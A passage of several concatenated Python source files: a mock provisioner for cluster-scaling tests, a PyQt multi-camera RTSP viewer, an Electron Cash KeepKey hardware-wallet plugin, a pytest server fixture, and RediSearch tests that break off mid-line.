self.running = True
self.leaderThread.start()
def shutDown(self):
self.running = False
self.leaderThread.join()
# Stub out all AbstractBatchSystem methods since they are never called
for name, value in iteritems(AbstractBatchSystem.__dict__):
if getattr(value, '__isabstractmethod__', False):
exec('def %s(): pass' % name)
# Without this, the class would end up with .name and .value attributes
del name, value
# AbstractScalableBatchSystem methods
def nodeInUse(self, nodeIP):
return False
def ignoreNode(self, nodeAddress):
pass
def unignoreNode(self, nodeAddress):
pass
@contextmanager
def nodeFiltering(self, filter):
nodes = self.getProvisionedWorkers(preemptable=True,
nodeType=None) + self.getProvisionedWorkers(
preemptable=False, nodeType=None)
yield nodes
# AbstractProvisioner methods
def getProvisionedWorkers(self, nodeType=None, preemptable=None):
"""
Returns a list of Node objects, each representing a worker node in the cluster
:param preemptable: If True only return preemptable nodes else return non-preemptable nodes
:return: list of Node
"""
nodesToWorker = self.nodesToWorker
if nodeType:
return [node for node in nodesToWorker if node.nodeType == nodeType]
else:
return list(nodesToWorker.keys())
def terminateNodes(self, nodes):
self._removeNodes(nodes)
def remainingBillingInterval(self, node):
pass
def addJob(self, jobShape, preemptable=False):
"""
Add a job to the job queue
"""
self.totalJobs += 1
jobID = uuid.uuid4()
self.jobBatchSystemIDToIssuedJob[jobID] = Job(memory=jobShape.memory,
cores=jobShape.cores, disk=jobShape.disk,
preemptable=preemptable)
self.jobQueue.put(jobID)
# JobBatcher functionality
def getNumberOfJobsIssued(self, preemptable=None):
if preemptable is not None:
jobList = [job for job in list(self.jobQueue.queue) if
self.jobBatchSystemIDToIssuedJob[job].preemptable == preemptable]
return len(jobList)
else:
return self.jobQueue.qsize()
def getJobs(self):
return self.jobBatchSystemIDToIssuedJob.values()
# AbstractScalableBatchSystem functionality
def getNodes(self, preemptable=False, timeout=None):
nodes = dict()
for node in self.nodesToWorker:
if node.preemptable == preemptable:
worker = self.nodesToWorker[node]
nodes[node.privateIP] = NodeInfo(coresTotal=0, coresUsed=0, requestedCores=1,
memoryTotal=0, memoryUsed=0, requestedMemory=1,
workers=1 if worker.busyEvent.is_set() else 0)
return nodes
# AbstractProvisioner functionality
def addNodes(self, nodeType, numNodes, preemptable):
self._addNodes(numNodes=numNodes, nodeType=nodeType, preemptable=preemptable)
return self.getNumberOfNodes(nodeType=nodeType, preemptable=preemptable)
def getNodeShape(self, nodeType, preemptable=False):
# Assume node shapes and node types are the same thing for testing
return nodeType
def getWorkersInCluster(self, nodeShape):
return self.workers[nodeShape]
def launchCluster(self, leaderNodeType, keyName, userTags=None,
vpcSubnet=None, leaderStorage=50, nodeStorage=50, botoPath=None, **kwargs):
pass
def destroyCluster(self):
pass
def getLeader(self):
pass
def _leaderFn(self):
while self.running:
updatedJobID = None
try:
updatedJobID = self.updatedJobsQueue.get(timeout=1.0)
except Empty:
continue
if updatedJobID:
del self.jobBatchSystemIDToIssuedJob[updatedJobID]
time.sleep(0.1)
def _addNodes(self, numNodes, nodeType, preemptable=False):
nodeShape = self.getNodeShape(nodeType=nodeType, preemptable=preemptable)
class Worker(object):
def __init__(self, jobQueue, updatedJobsQueue, secondsPerJob):
self.busyEvent = Event()
self.stopEvent = Event()
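                # busyEvent marks the worker as occupied while it simulates a
                # running job; stopEvent tells workerFn to exit on its next loop.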
def workerFn():
while True:
if self.stopEvent.is_set():
return
try:
jobID = jobQueue.get(timeout=1.0)
except Empty:
continue
updatedJobsQueue.put(jobID)
self.busyEvent.set()
time.sleep(secondsPerJob)
self.busyEvent.clear()
self.startTime = time.time()
self.worker = Thread(target=workerFn)
self.worker.start()
def stop(self):
self.stopEvent.set()
self.worker.join()
return time.time() - self.startTime
for _ in range(numNodes):
node = Node('127.0.0.1', uuid.uuid4(), 'testNode', datetime.datetime.now().isoformat()+'Z', nodeType=nodeType,
preemptable=preemptable)
self.nodesToWorker[node] = Worker(self.jobQueue, self.updatedJobsQueue, self.secondsPerJob)
self.workers[nodeShape].append(self.nodesToWorker[node])
self.maxWorkers[nodeShape] = max(self.maxWorkers[nodeShape], len(self.workers[nodeShape]))
def _removeNodes(self, nodes):
logger.debug("Removing nodes. %s workers and %s to terminate.", len(self.nodesToWorker),
len(nodes))
for node in nodes:
logger.debug("removed node")
try:
nodeShape = self.getNodeShape(node.nodeType, node.preemptable)
worker = self.nodesToWorker.pop(node)
self.workers[nodeShape].pop()
self.totalWorkerTime += worker.stop()
except KeyError:
# Node isn't our responsibility
pass
def getNumberOfNodes(self, nodeType=None, preemptable=None):
if nodeType:
nodeShape = self.getNodeShape(nodeType=nodeType, preemptable=preemptable)
return len(self.workers[nodeShape])
else:
return len(self.nodesToWorker)
|
gui_camera_feed.py
|
from constants import *
from PyQt5 import QtCore, QtGui, QtWidgets
import qdarkstyle
from threading import Thread
from collections import deque
from datetime import datetime
import time
import sys
import cv2
import imutils
from aieAPI.aieAPI import AIE, call_aie
class CameraWidget(QtWidgets.QWidget):
"""Independent camera feed
Uses threading to grab IP camera frames in the background
@param width - Width of the video frame
@param height - Height of the video frame
@param stream_link - IP/RTSP/Webcam link
@param aspect_ratio - Whether to maintain frame aspect ratio or force into frame
"""
def __init__(self, aie, width, height, stream_link=0, aspect_ratio=False, parent=None, deque_size=1):
super(CameraWidget, self).__init__(parent)
self.aie = AIE() if aie is None else aie
# Initialize deque used to store frames read from the stream
self.deque = deque(maxlen=deque_size)
# Slight offset is needed since PyQt layouts have a built in padding
# So add offset to counter the padding
self.offset = 16
self.screen_width = width - self.offset
self.screen_height = height - self.offset
self.maintain_aspect_ratio = aspect_ratio
self.camera_stream_link = stream_link
# Flag to check if camera is valid/working
self.online = False
self.capture = None
self.video_frame = QtWidgets.QLabel()
self.load_network_stream()
# Start background frame grabbing
self.get_frame_thread = Thread(target=self.get_frame, args=())
self.get_frame_thread.daemon = True
self.get_frame_thread.start()
# Periodically set video frame to display
self.timer = QtCore.QTimer()
self.timer.timeout.connect(self.set_frame)
self.timer.start(1)
print('Started camera: {}'.format(self.camera_stream_link))
def load_network_stream(self):
"""Verifies stream link and open new stream if valid"""
def load_network_stream_thread():
if self.verify_network_stream(self.camera_stream_link):
self.capture = cv2.VideoCapture(self.camera_stream_link)
self.online = True
self.load_stream_thread = Thread(target=load_network_stream_thread, args=())
self.load_stream_thread.daemon = True
self.load_stream_thread.start()
def verify_network_stream(self, link):
"""Attempts to receive a frame from given link"""
cap = cv2.VideoCapture(link)
if not cap.isOpened():
return False
cap.release()
return True
def get_frame(self):
"""Reads frame, resizes, and converts image to pixmap"""
# aie = AIE()
fps = 0.
while True:
try:
if self.capture.isOpened() and self.online:
# Read next frame from stream and insert into deque
tic = time.perf_counter()
status, frame = self.capture.read()
if status:
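                        # Run the frame through the AIE pipeline (project-specific
                        # aieAPI; assumed to return an annotated frame)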
frame = call_aie(frame, fps, self.aie)
fps = 1. / (time.perf_counter() - tic)
self.deque.append(frame)
else:
self.capture.release()
self.online = False
else:
# Attempt to reconnect
print('attempting to reconnect', self.camera_stream_link)
self.load_network_stream()
self.spin(2)
self.spin(.001)
except AttributeError:
pass
def spin(self, seconds):
"""Pause for set amount of seconds, replaces time.sleep so program doesnt stall"""
time_end = time.time() + seconds
while time.time() < time_end:
QtWidgets.QApplication.processEvents()
def set_frame(self):
"""Sets pixmap image to video frame"""
if not self.online:
self.spin(1)
return
if self.deque and self.online:
# Grab latest frame
frame = self.deque[-1]
# Keep frame aspect ratio
if self.maintain_aspect_ratio:
self.frame = imutils.resize(frame, width=self.screen_width)
# Force resize
else:
self.frame = cv2.resize(frame, (self.screen_width, self.screen_height))
# Add timestamp to cameras
cv2.rectangle(self.frame, (self.screen_width - 190, 0), (self.screen_width, 50), color=(0, 0, 0),
thickness=-1)
cv2.putText(self.frame, datetime.now().strftime('%H:%M:%S'), (self.screen_width - 185, 37),
cv2.FONT_HERSHEY_SIMPLEX, 1.2, (255, 255, 255), lineType=cv2.LINE_AA)
# Convert to pixmap and set to video frame
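            # Note: OpenCV frames are BGR while Format_RGB888 expects RGB, so
            # colours may appear swapped unless the frame is converted first.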
self.img = QtGui.QImage(self.frame, self.frame.shape[1], self.frame.shape[0],
QtGui.QImage.Format_RGB888)
self.pix = QtGui.QPixmap.fromImage(self.img)
self.video_frame.setPixmap(self.pix)
def get_video_frame(self):
return self.video_frame
def exit_application():
"""Exit program event handler"""
sys.exit(1)
if __name__ == '__main__':
# aie_global = AIE()
aie_global = None
# Create main application window
app = QtWidgets.QApplication([])
app.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())
app.setStyle(QtWidgets.QStyleFactory.create("Cleanlooks"))
mw = QtWidgets.QMainWindow()
mw.setWindowTitle('Camera GUI')
mw.setWindowFlags(QtCore.Qt.FramelessWindowHint)
cw = QtWidgets.QWidget()
ml = QtWidgets.QGridLayout()
cw.setLayout(ml)
mw.setCentralWidget(cw)
mw.showMaximized()
# Dynamically determine screen width/height
screen_width = QtWidgets.QApplication.desktop().screenGeometry().width()
screen_height = QtWidgets.QApplication.desktop().screenGeometry().height()
# Create Camera Widgets
username = 'Your camera username!'
password = 'Your camera password!'
# Stream links
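    # NOTE: the host/credential parts of these URLs appear to have been
    # redacted; as written, the format() calls have no placeholders to fill.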
camera0 = 'rtsp://admin:[email protected]:554/h264Preview_01_sub'.format(CAMERA_USER, CAMERA_PSWD)
camera1 = 'rtsp://admin:[email protected]:554/h264Preview_01_sub'.format(CAMERA_USER, CAMERA_PSWD)
camera2 = 'rtsp://admin:[email protected]:554/h264Preview_01_sub'.format(CAMERA_USER, CAMERA_PSWD)
# Create camera widgets
print('Creating Camera Widgets...')
zero = CameraWidget(aie_global, screen_width // 3, screen_height // 3, camera0)
one = CameraWidget(aie_global, screen_width // 3, screen_height // 3, camera1)
two = CameraWidget(aie_global, screen_width // 3, screen_height // 3, camera2)
# Add widgets to layout
print('Adding widgets to layout...')
ml.addWidget(zero.get_video_frame(), 0, 0, 1, 1)
ml.addWidget(one.get_video_frame(), 0, 1, 1, 1)
ml.addWidget(two.get_video_frame(), 0, 2, 1, 1)
# ml.addWidget(three.get_video_frame(),1,0,1,1)
# ml.addWidget(four.get_video_frame(),1,1,1,1)
# ml.addWidget(five.get_video_frame(),1,2,1,1)
# ml.addWidget(six.get_video_frame(),2,0,1,1)
# ml.addWidget(seven.get_video_frame(),2,1,1,1)
print('Verifying camera credentials...')
mw.show()
QtWidgets.QShortcut(QtGui.QKeySequence('Ctrl+Q'), mw, exit_application)
if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
QtWidgets.QApplication.instance().exec_()
|
plugin.py
|
import threading
from binascii import hexlify, unhexlify
from electroncash.util import bfh, bh2u, UserCancelled
from electroncash.bitcoin import (b58_address_to_hash160, xpub_from_pubkey,
TYPE_ADDRESS, TYPE_SCRIPT)
from electroncash.i18n import _
from electroncash.networks import NetworkConstants
from electroncash.plugins import BasePlugin
from electroncash.transaction import deserialize
from electroncash.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from ..hw_wallet import HW_PluginBase
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKeyCompatibleKeyStore(Hardware_KeyStore):
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class KeepKeyCompatiblePlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.main_thread = threading.current_thread()
# FIXME: move to base class when Ledger is fixed
if self.libraries_available:
self.device_manager().register_devices(self.DEVICE_IDS)
def _try_hid(self, device):
self.print_error("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.print_error("cannot connect at", device.path, str(e))
return None
def _try_bridge(self, device):
self.print_error("Trying to connect over Trezor Bridge...")
try:
return self.bridge_transport({'path': hexlify(device.path)})
except BaseException as e:
self.print_error("cannot connect to bridge", str(e))
return None
def create_client(self, device, handler):
        # Disable the bridge because it seems to never return if a KeepKey is plugged in
#transport = self._try_bridge(device) or self._try_hid(device)
transport = self._try_hid(device)
if not transport:
self.print_error("cannot connect to device")
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
handler.show_error(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if NetworkConstants.TESTNET else "Bitcoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target = self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
wizard.loop.exec_()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except Exception as e:
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def setup_device(self, device_info, wizard):
'''Called when creating a new wallet. Select the device to use. If
        the device is uninitialized, go through the initialization
        process.'''
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[1]
raw = bh2u(signed_tx)
tx.update_signatures(raw)
def show_address(self, wallet, address):
client = self.get_client(wallet.keystore)
if not client.atleast_version(1, 3):
wallet.keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = wallet.keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
script_type = self.types.SPENDADDRESS
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = "\0"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
txinputtype.script_type = self.types.SPENDADDRESS
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey('standard', bfh(x_pubkey))
s = []
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=s)
pubkeys = map(f, x_pubkeys)
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
m=txin.get('num_sig'),
)
script_type = self.types.SPENDMULTISIG
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if 'scriptSig' in txin:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
outputs = []
has_change = False
for _type, address, amount in tx.outputs():
info = tx.output_info.get(address)
if info is not None and not has_change:
has_change = True # no more than one change address
index, xpubs, m = info
if len(xpubs) == 1:
script_type = self.types.PAYTOADDRESS
address_n = self.client_class.expand_path(derivation + "/%d/%d"%index)
txoutputtype = self.types.TxOutputType(
amount = amount,
script_type = script_type,
address_n = address_n,
)
else:
script_type = self.types.PAYTOMULTISIG
address_n = self.client_class.expand_path("/%d/%d"%index)
nodes = map(self.ckd_public.deserialize, xpubs)
pubkeys = [ self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
multisig = self.types.MultisigRedeemScriptType(
pubkeys = pubkeys,
signatures = [b''] * len(pubkeys),
m = m)
txoutputtype = self.types.TxOutputType(
multisig = multisig,
amount = amount,
address_n = self.client_class.expand_path(derivation + "/%d/%d"%index),
script_type = script_type)
else:
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = address.to_script()[2:]
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.PAYTOADDRESS
txoutputtype.address = address.to_full_ui_string()
outputs.append(txoutputtype)
return outputs
def electroncash_tx_to_txtype(self, tx):
t = self.types.TransactionType()
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the trezor libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electroncash_tx_to_txtype(tx)
|
conftest.py
|
from . import server
import pytest
from threading import Thread
@pytest.fixture(scope='module', autouse=True)
def server_setup():
instance = server.create_server()
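    # Run the test server in a daemon thread so it is torn down automatically
    # when the test process exits.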
process = Thread(target=instance.serve_forever)
process.setDaemon(True)
process.start()
|
test.py
|
# -*- coding: utf-8 -*-
import redis
import unittest
from hotels import hotels
import random
import time
from RLTest import Env
def testAdd(env):
if env.is_cluster():
raise unittest.SkipTest()
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text', 'body', 'text'))
env.assertTrue(r.exists('idx:idx'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1.0, 'fields',
'title', 'hello world',
'body', 'lorem ist ipsum'))
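    # retry_with_rdb_reload re-runs these assertions around an RDB dump/reload,
    # so the index keys must survive persistence.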
for _ in r.retry_with_rdb_reload():
prefix = 'ft'
env.assertExists(prefix + ':idx/hello')
env.assertExists(prefix + ':idx/world')
env.assertExists(prefix + ':idx/lorem')
def testConditionalUpdate(env):
env.assertOk(env.cmd(
'ft.create', 'idx', 'schema', 'foo', 'text', 'bar', 'numeric', 'sortable'))
env.assertOk(env.cmd('ft.add', 'idx', '1', '1',
'fields', 'foo', 'hello', 'bar', '123'))
env.assertOk(env.cmd('ft.add', 'idx', '1', '1', 'replace', 'if',
'@foo == "hello"', 'fields', 'foo', 'world', 'bar', '123'))
env.assertEqual('NOADD', env.cmd('ft.add', 'idx', '1', '1', 'replace',
'if', '@foo == "hello"', 'fields', 'foo', 'world', 'bar', '123'))
env.assertEqual('NOADD', env.cmd('ft.add', 'idx', '1', '1', 'replace',
'if', '1 == 2', 'fields', 'foo', 'world', 'bar', '123'))
env.assertOk(env.cmd('ft.add', 'idx', '1', '1', 'replace', 'partial', 'if',
'@foo == "world"', 'fields', 'bar', '234'))
env.assertOk(env.cmd('ft.add', 'idx', '1', '1', 'replace', 'if',
'@bar == 234', 'fields', 'foo', 'hello', 'bar', '123'))
# Ensure that conditionals are ignored if the document doesn't exist
env.assertOk(env.cmd('FT.ADD', 'idx', '666', '1',
'IF', '@bar > 42', 'FIELDS', 'bar', '15'))
# Ensure that it fails if we try again, because it already exists
env.assertEqual('NOADD', env.cmd('FT.ADD', 'idx', '666', '1',
'REPLACE', 'IF', '@bar > 42', 'FIELDS', 'bar', '15'))
# Ensure that it fails because we're not using 'REPLACE'
with env.assertResponseError():
env.assertOk(env.cmd('FT.ADD', 'idx', '666', '1',
'IF', '@bar > 42', 'FIELDS', 'bar', '15'))
def testUnionIdList(env):
# Regression test for https://github.com/RediSearch/RediSearch/issues/306
r = env
N = 100
env.assertOk(r.execute_command(
"ft.create", "test", "SCHEMA", "tags", "TAG", "waypoint", "GEO"))
env.assertOk(r.execute_command(
"ft.add", "test", "1", "1", "FIELDS", "tags", "alberta", "waypoint", "-113.524,53.5244"))
env.assertOk(r.execute_command(
"ft.add", "test", "2", "1", "FIELDS", "tags", "ontario", "waypoint", "-79.395,43.661667"))
print r.cmd('ft.search', 'test', '@tags:{ontario}')
res = r.execute_command(
'ft.search', 'test', "@waypoint:[-113.52 53.52 20 mi]|@tags:{ontario}", 'nocontent')
env.assertEqual(res, [2, '2', '1'])
def testAttributes(env):
env.assertOk(env.cmd('ft.create', 'idx', 'schema',
'title', 'text', 'body', 'text'))
env.assertOk(env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields',
'title', 't1 t2', 'body', 't3 t4 t5'))
env.assertOk(env.cmd('ft.add', 'idx', 'doc2', 1.0, 'fields',
'body', 't1 t2', 'title', 't3 t5'))
res = env.cmd(
'ft.search', 'idx', '(@title:(t1 t2) => {$weight: 0.2}) |(@body:(t1 t2) => {$weight: 0.5})', 'nocontent')
env.assertListEqual([2L, 'doc2', 'doc1'], res)
res = env.cmd(
'ft.search', 'idx', '(@title:(t1 t2) => {$weight: 2.5}) |(@body:(t1 t2) => {$weight: 0.5})', 'nocontent')
env.assertListEqual([2L, 'doc1', 'doc2'], res)
res = env.cmd(
'ft.search', 'idx', '(t3 t5) => {$slop: 4}', 'nocontent')
env.assertListEqual([2L, 'doc2', 'doc1'], res)
res = env.cmd(
'ft.search', 'idx', '(t5 t3) => {$slop: 0}', 'nocontent')
env.assertListEqual([1L, 'doc2'], res)
res = env.cmd(
'ft.search', 'idx', '(t5 t3) => {$slop: 0; $inorder:true}', 'nocontent')
env.assertListEqual([0], res)
def testUnion(env):
N = 100
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'f', 'text'))
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'f', 'hello world' if i % 2 == 0 else 'hallo werld'))
for _ in r.retry_with_rdb_reload():
res = r.execute_command(
'ft.search', 'idx', 'hello|hallo', 'nocontent', 'limit', '0', '100')
env.assertEqual(N + 1, len(res))
env.assertEqual(N, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello|world', 'nocontent', 'limit', '0', '100')
env.assertEqual(51, len(res))
env.assertEqual(50, res[0])
res = r.execute_command('ft.search', 'idx', '(hello|hello)(world|world)',
'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(51, len(res))
env.assertEqual(50, res[0])
res = r.execute_command(
'ft.search', 'idx', '(hello|hallo)(werld|world)', 'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(101, len(res))
env.assertEqual(100, res[0])
res = r.execute_command(
'ft.search', 'idx', '(hallo|hello)(world|werld)', 'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(101, len(res))
env.assertEqual(100, res[0])
res = r.execute_command(
'ft.search', 'idx', '(hello|werld)(hallo|world)', 'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(101, len(res))
env.assertEqual(100, res[0])
res = r.execute_command(
'ft.search', 'idx', '(hello|hallo) world', 'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(51, len(res))
env.assertEqual(50, res[0])
res = r.execute_command(
'ft.search', 'idx', '(hello world)|((hello world)|(hallo world|werld) | hello world werld)', 'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(101, len(res))
env.assertEqual(100, res[0])
def testSearch(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text', 'weight', 10.0, 'body', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
'title', 'hello world',
'body', 'lorem ist ipsum'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
'title', 'hello another world',
'body', 'lorem ist ipsum lorem lorem'))
for _ in r.retry_with_rdb_reload():
res = r.execute_command('ft.search', 'idx', 'hello')
env.assertTrue(len(res) == 5)
env.assertEqual(res[0], 2L)
env.assertEqual(res[1], "doc2")
env.assertTrue(isinstance(res[2], list))
env.assertTrue('title' in res[2])
env.assertTrue('hello another world' in res[2])
env.assertEqual(res[3], "doc1")
env.assertTrue('hello world' in res[4])
# Test empty query
res = r.execute_command('ft.search', 'idx', '')
env.assertListEqual([0], res)
# Test searching with no content
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent')
env.assertTrue(len(res) == 3)
env.assertEqual(res[0], 2L)
env.assertEqual(res[1], "doc2")
env.assertEqual(res[2], "doc1")
# Test searching WITHSCORES
res = r.execute_command(
'ft.search', 'idx', 'hello', 'WITHSCORES')
env.assertEqual(len(res), 7)
env.assertEqual(res[0], 2L)
env.assertEqual(res[1], "doc2")
env.assertTrue(float(res[2]) > 0)
env.assertEqual(res[4], "doc1")
env.assertTrue(float(res[5]) > 0)
# Test searching WITHSCORES NOCONTENT
res = r.execute_command(
'ft.search', 'idx', 'hello', 'WITHSCORES', 'NOCONTENT')
env.assertEqual(len(res), 5)
env.assertEqual(res[0], 2L)
env.assertEqual(res[1], "doc2")
env.assertTrue(float(res[2]) > 0)
env.assertEqual(res[3], "doc1")
env.assertTrue(float(res[4]) > 0)
def testSearchNosave(env):
# Check to see what happens when we try to return unsaved documents
env.cmd('ft.create', 'idx', 'SCHEMA', 'f1', 'text')
# Add 3 documents
for x in range(3):
env.cmd('ft.add', 'idx', 'doc{}'.format(x),
1.0, 'NOSAVE', 'FIELDS', 'f1', 'value')
# Now query the results
res = env.cmd('ft.search', 'idx', 'value')
env.assertEqual(3, res[0])
for content in res[2::2]:
env.assertEqual([], content)
def testGet(env):
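# FT.GET/FT.MGET should return the stored fields, and None for missing or deleted docs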
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text', 'bar', 'text'))
for i in range(100):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'foo', 'hello world', 'bar', 'wat wat'))
for i in range(100):
res = r.execute_command('ft.get', 'idx', 'doc%d' % i)
env.assertIsNotNone(res)
env.assertListEqual(
['foo', 'hello world', 'bar', 'wat wat'], res)
env.assertIsNone(r.execute_command(
'ft.get', 'idx', 'doc%dsdfsd' % i))
rr = r.execute_command(
